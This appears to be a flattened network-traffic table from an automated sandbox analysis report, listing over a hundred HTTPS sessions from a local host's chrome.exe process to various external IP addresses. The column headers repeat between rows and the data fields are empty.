                                                                                                                                                          922192.168.2.55070743.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          923192.168.2.55071390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          924192.168.2.55071523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          925192.168.2.55071490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          926192.168.2.55071790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          927192.168.2.55071990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          928192.168.2.55071890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          929192.168.2.55072023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          930192.168.2.550710183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          931192.168.2.550711183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          932192.168.2.55072290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          933192.168.2.55072390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          934192.168.2.55072590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          935192.168.2.55072690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          936192.168.2.550716183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          937192.168.2.55072790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          938192.168.2.55072490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          939192.168.2.55072890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          940192.168.2.55068438.174.148.2324434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          941192.168.2.55073290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          942192.168.2.55073190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          943192.168.2.55073490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          944192.168.2.55073623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          945192.168.2.55072954.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          946192.168.2.55073390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          947192.168.2.55073990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          948192.168.2.550694202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          949192.168.2.55073723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          950192.168.2.55074023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          951192.168.2.55073043.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          952192.168.2.55074223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          953192.168.2.55073554.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          954192.168.2.55074323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          955192.168.2.55073843.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          956192.168.2.55074623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          957192.168.2.55074723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          958192.168.2.55074823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          959192.168.2.55074590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          960192.168.2.550741183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          961192.168.2.550744113.16.211.34434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          962192.168.2.55074990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          963192.168.2.55070438.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          964192.168.2.55075023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          965192.168.2.55075123.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          966192.168.2.55075490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          967192.168.2.55075690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          968192.168.2.55075790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          969192.168.2.55075590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          970192.168.2.55076023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          971192.168.2.550752163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          972192.168.2.55075990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          973192.168.2.55075890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          974192.168.2.55070538.174.148.2334434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          975192.168.2.55072138.174.148.24434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          976192.168.2.55076290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          977192.168.2.55076590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          978192.168.2.55076390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          979192.168.2.55076790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          980192.168.2.55076690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          981192.168.2.55076190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          982192.168.2.55076490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          983192.168.2.55077190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          984192.168.2.55077290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          985192.168.2.55077390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          986192.168.2.55076854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          987192.168.2.550769183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          988192.168.2.550770183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          989192.168.2.55077423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          990192.168.2.55077590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          991192.168.2.55077723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          992192.168.2.55078923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          993192.168.2.55077923.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          994192.168.2.55078390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          995192.168.2.55078823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          996192.168.2.55078290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          997192.168.2.55078023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          998192.168.2.55078723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          999192.168.2.55079023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1000192.168.2.55079190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1001192.168.2.550776183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1002192.168.2.55078423.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1003192.168.2.55077854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1004192.168.2.550786202.61.87.2244434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1005192.168.2.55078143.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1006192.168.2.55078543.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1007192.168.2.55079254.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1008192.168.2.55079490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1009192.168.2.55079343.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1010192.168.2.550795183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1011192.168.2.55079723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1012192.168.2.55079623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1013192.168.2.55079890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1014192.168.2.55079990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1015192.168.2.55080023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1016192.168.2.55080190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1017192.168.2.55080290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1018192.168.2.55019438.174.148.434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1019192.168.2.55080390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1020192.168.2.55080490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1021192.168.2.55080590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1022192.168.2.55080690.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1023192.168.2.550807163.181.92.2434434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1024192.168.2.55080890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1025192.168.2.55080990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1026192.168.2.55081190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1027192.168.2.55081090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1028192.168.2.55081390.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1029192.168.2.55081290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1030192.168.2.55081490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1031192.168.2.55081523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1032192.168.2.550816163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1033192.168.2.55081723.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1034192.168.2.55082023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1035192.168.2.55082490.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1036192.168.2.55082323.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1037192.168.2.55082223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1038192.168.2.55082523.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1039192.168.2.55082623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1040192.168.2.55082790.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1041192.168.2.55081854.150.37.1304434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1042192.168.2.55082823.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1043192.168.2.55082990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1044192.168.2.55083023.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1045192.168.2.55081943.201.120.1604434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          1046192.168.2.550821183.61.243.14434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
